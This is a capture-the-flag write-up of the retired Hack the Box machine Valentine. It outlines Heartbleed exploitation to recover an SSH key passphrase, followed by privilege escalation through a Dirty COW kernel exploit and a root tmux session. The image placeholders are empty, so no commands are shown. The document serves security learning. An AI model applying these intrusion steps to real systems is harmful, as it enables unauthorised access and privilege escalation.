Friday, March 22, 2019

Valentine


VALENTINE

- Layout for this exercise:





1 - INTRODUCTION

-  The goal of this exercise is to develop a hacking process for the vulnerable machine Valentine, what is a retired machine from the Hack the Box pentesting platform:

https://www.hackthebox.eu


2 - ENUMERATION

- Valentine's IP is 10.10.10.79:




- Scanning with Nmap:







- Connecting with the browser at port 80 the image is very reminiscent of the Heartbleed vulnerability icon:





- Same thing with HTTPS at port 443:





- There is a lot of information available about Heartbleed vulnerability:

http://heartbleed.com/

https://en.wikipedia.org/wiki/Heartbleed


- Nmap script confirms the Heartbleed vulnerability:





- Dirbusting Valentine's web server:





- Checking folder /encode:






- Checking folder /decode:




- Going to /dev:




- Reading notes.txt:




- Reading hype_key:





- Copying hype_key locally:





- Because hype_key is written with hexadecimal numbers let's decode it:




- It seems that we are dealing with an RSA Private key. Copying it locally:




3 - EXPLOITATION

- Looking for an exploit related to Heartbleed vulnerability:







- Copying the Python script 32764.py to the working folder:





- Now, launching the script against Valentine's IP:



..................................





- The answer includes a reference to a string encoded with Base64:








- Decoding the string we get a plaint text string: heartbleedbelievethehype





- Going back to the encrypted key, let's see whether openssl help to decrypt it by providing as password the string heartbleedbelievethehype:




- The new decrypted ssh_key:





- SSH-ing valentine with user hype's credentials:





- The remote shell is low privileged:






4 - CAPTURING THE 1st FLAG

- Reading user.txt:




5 - PRIVILEGE ESCALATION

- Let's try two ways for Privilege Escalation:


5.1 - Kernel exploitation

- First, checking Operating System version and Kernel number:








- There are some exploits for Linux 3.2 kernel version, for instance this one:






- Downloading to Kali and transferring to Valentine:







- Compiling according to the instructions:







- Now, a new password must be entered, for instance hello:







- Switching to the user firefart with the new password hello we get a root shell:





5.2 - Tmux

- Reading the hidden file .bash_history there is a reference to a tmux command:








- Also, ps aux confirms that there is a tmux session running as root:




- Finally, just running the tmux command found at .bash_history we get a remote root shell:








6 - CAPTURING THE 2nd FLAG

- Reading root.txt: